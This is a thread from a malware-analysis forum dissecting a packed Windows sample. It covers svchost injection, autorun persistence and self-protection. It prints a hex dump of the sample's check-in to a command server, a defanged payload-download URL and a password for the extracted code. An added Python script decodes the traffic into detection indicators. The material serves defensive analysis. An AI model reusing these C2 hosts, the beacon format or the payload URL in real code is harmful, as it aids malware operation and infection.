A forum for reverse engineering, OS internals and malware analysis 

 #379  by EP_X0FF
 Mon Mar 22, 2010 4:11 am
Hi Ade,

Thank you for the interesting sample.

Packed with UPX and a custom malware packer/cryptor. Inside, it contains several bound resources (a window with a button, a version info block and encrypted data).
It sets itself to autostart with Windows through the Autorun directory. After starting, this malware maps itself into svchost.exe memory and creates a thread inside the svchost.exe address space.
The thread is put on wait with Sleep. It protects itself from deletion by keeping an open handle to the executable from svchost.exe. The malware file (all files with the same name) is inaccessible through Explorer.

In the attachment you will find the malware code extracted from svchost.exe (imports not restored).

Regards.
Attachments
pass: malware
 #380  by kmd
 Mon Mar 22, 2010 6:01 am
Performs network activity:
4745 5420 2f6e 6577 2f63 6f6e 7472 6f6c GET /new/control
6c65 722e 7068 703f 6163 7469 6f6e 3d72 ler.php?action=r
6570 6f72 7426 7569 643d 3126 6775 6964 eport&uid=1&guid
3d34 3132 3832 3139 3737 3926 726e 643d =4128219779&rnd=
3132 3326 656e 7469 7479 3d31 3235 3933 123&entity=12593
3531 3439 303a 756e 6971 7565 5f73 7461 51490:unique_sta
7274 3b31 3236 3534 3634 3531 303a 756e rt;1265464510:un
6971 7565 5f73 7461 7274 2048 5454 502f ique_start HTTP/
312e 310d 0a48 6f73 743a 2063 6f6f 6c62 1.1..Host: coolb
6c65 6e64 6572 2e72 750d 0a0d 0a lender.ru....
Data received:

4854 5450 2f31 2e31 2032 3030 204f 4b0d HTTP/1.1 200 OK.
0a53 6572 7665 723a 206e 6769 6e78 0d0a .Server: nginx..
4461 7465 3a20 5375 6e2c 2032 3120 4d61 Date: Sun, 21 Ma
7220 3230 3130 2031 333a 3331 3a30 3020 r 2010 13:31:00
474d 540d 0a43 6f6e 7465 6e74 2d54 7970 GMT..Content-Typ
653a 2074 6578 742f 6874 6d6c 3b20 6368 e: text/html; ch
6172 7365 743d 7574 662d 380d 0a43 6f6e arset=utf-8..Con
6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection: close..
582d 506f 7765 7265 642d 4279 3a20 5048 X-Powered-By: PH
502f 352e 312e 360d 0a43 6f6e 7465 6e74 P/5.1.6..Content
2d4c 656e 6774 683a 2030 0d0a 0d0a -Length: 0....
http://anubis.iseclab.org/?action=resul ... format=txt

hxxp://173.208.143.194/app20.bin
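To make the capture above usable for detection work, here is an added example (written for this thread, not code from either poster) that decodes the hex dump back into the raw HTTP exchange and pulls out the fields a defender would log or alert on: the contacted host, the controller path, the per-victim identifiers in the query string, and the Unix timestamps embedded in the `entity` parameter. The two dump strings are copied verbatim from kmd's post; the dump layout (up to eight groups of four hex digits per line, followed by an ASCII rendering) is assumed from how it appears there, and the HTTP parsing is generic.

```python
"""Decode a 'hex groups + ASCII' traffic dump and triage the HTTP beacon in it.

Added example for this thread, not code from the original posts.  The dumps
below are copied from kmd's post; the column layout is assumed from the post.
"""
import re
from datetime import datetime, timezone

# Request dump as posted (constructed input for this example: copied verbatim).
REQUEST_DUMP = """\
4745 5420 2f6e 6577 2f63 6f6e 7472 6f6c GET /new/control
6c65 722e 7068 703f 6163 7469 6f6e 3d72 ler.php?action=r
6570 6f72 7426 7569 643d 3126 6775 6964 eport&uid=1&guid
3d34 3132 3832 3139 3737 3926 726e 643d =4128219779&rnd=
3132 3326 656e 7469 7479 3d31 3235 3933 123&entity=12593
3531 3439 303a 756e 6971 7565 5f73 7461 51490:unique_sta
7274 3b31 3236 3534 3634 3531 303a 756e rt;1265464510:un
6971 7565 5f73 7461 7274 2048 5454 502f ique_start HTTP/
312e 310d 0a48 6f73 743a 2063 6f6f 6c62 1.1..Host: coolb
6c65 6e64 6572 2e72 750d 0a0d 0a lender.ru....
"""

# Response dump as posted.
RESPONSE_DUMP = """\
4854 5450 2f31 2e31 2032 3030 204f 4b0d HTTP/1.1 200 OK.
0a53 6572 7665 723a 206e 6769 6e78 0d0a .Server: nginx..
4461 7465 3a20 5375 6e2c 2032 3120 4d61 Date: Sun, 21 Ma
7220 3230 3130 2031 333a 3331 3a30 3020 r 2010 13:31:00
474d 540d 0a43 6f6e 7465 6e74 2d54 7970 GMT..Content-Typ
653a 2074 6578 742f 6874 6d6c 3b20 6368 e: text/html; ch
6172 7365 743d 7574 662d 380d 0a43 6f6e arset=utf-8..Con
6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection: close..
582d 506f 7765 7265 642d 4279 3a20 5048 X-Powered-By: PH
502f 352e 312e 360d 0a43 6f6e 7465 6e74 P/5.1.6..Content
2d4c 656e 6774 683a 2030 0d0a 0d0a -Length: 0....
"""

# One data group is 2 or 4 hex digits (the last group of a line may be short).
HEX_GROUP = re.compile(r"^[0-9a-fA-F]{2}(?:[0-9a-fA-F]{2})?$")


def decode_dump(dump: str) -> bytes:
    """Rebuild the raw bytes from a dump line by line.

    Only the first eight tokens of a line can be data; stopping there keeps us
    from swallowing ASCII-column text that happens to look like hex ("2010").
    """
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[:8]:
            if not HEX_GROUP.match(tok):
                break  # reached the ASCII rendering on a short line
            out += bytes.fromhex(tok)
    return bytes(out)


def parse_http(raw: bytes) -> dict:
    """Split an HTTP/1.x message into start line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start_line": lines[0], "headers": headers, "body": body}


def parse_beacon(raw: bytes) -> dict:
    """Extract the fields of the check-in request worth logging or alerting on."""
    msg = parse_http(raw)
    method, target, version = msg["start_line"].split(" ", 2)
    path, _, query = target.partition("?")
    # Split the query by hand: the entity value contains ';', which some
    # parse_qs versions treat as a second separator.
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key] = value
    # entity=<unix_ts>:<event>;<unix_ts>:<event> -> list of (event, ISO time)
    events = []
    for item in params.get("entity", "").split(";"):
        ts, _, name = item.partition(":")
        if ts.isdigit():
            when = datetime.fromtimestamp(int(ts), tz=timezone.utc)
            events.append((name, when.isoformat()))
    return {"method": method, "version": version, "host": msg["headers"].get("host"),
            "path": path, "params": params, "events": events}


def parse_response(raw: bytes) -> dict:
    """Return the status code and headers of the controller's reply."""
    msg = parse_http(raw)
    status = int(msg["start_line"].split()[1])
    return {"status": status, "headers": msg["headers"], "body": msg["body"]}


if __name__ == "__main__":
    req = parse_beacon(decode_dump(REQUEST_DUMP))
    resp = parse_response(decode_dump(RESPONSE_DUMP))
    print(req["method"], req["host"], req["path"], req["params"]["action"])
    for name, when in req["events"]:
        print(f"  {name}: {when}")
    print("reply:", resp["status"], resp["headers"].get("content-length"))
```

The identifiers (`uid`, `guid`, `rnd`) and the `entity` timestamps are what make this request useful as a signature: the host plus the `/new/controller.php?action=report` pattern can go straight into a proxy or IDS rule, while the decoded timestamps give an approximate first-run date for the infected machine during incident scoping. The empty `200 OK` reply means the controller acknowledged the check-in without tasking, so the absence of a body is not a sign the traffic is benign.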